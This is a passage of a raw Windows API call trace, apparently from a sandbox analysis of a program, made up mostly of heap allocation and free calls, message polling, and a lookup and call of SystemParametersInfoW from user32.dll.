0x2e51910 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0286.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0286.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0286.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0286.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0286.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0286.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0286.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0286.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0286.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0286.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0286.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0286.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0286.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0286.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0286.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0286.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0286.349] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0286.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0286.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b48 [0286.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69b48, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0286.350] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0286.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0286.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0286.350] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0286.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0286.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0286.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0286.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0286.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0286.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0286.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0286.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0286.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0286.530] FreeLibrary (hLibModule=0x750c0000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0286.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0286.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0286.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0286.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0286.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0286.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0286.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0286.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0286.532] HeapFree (in: 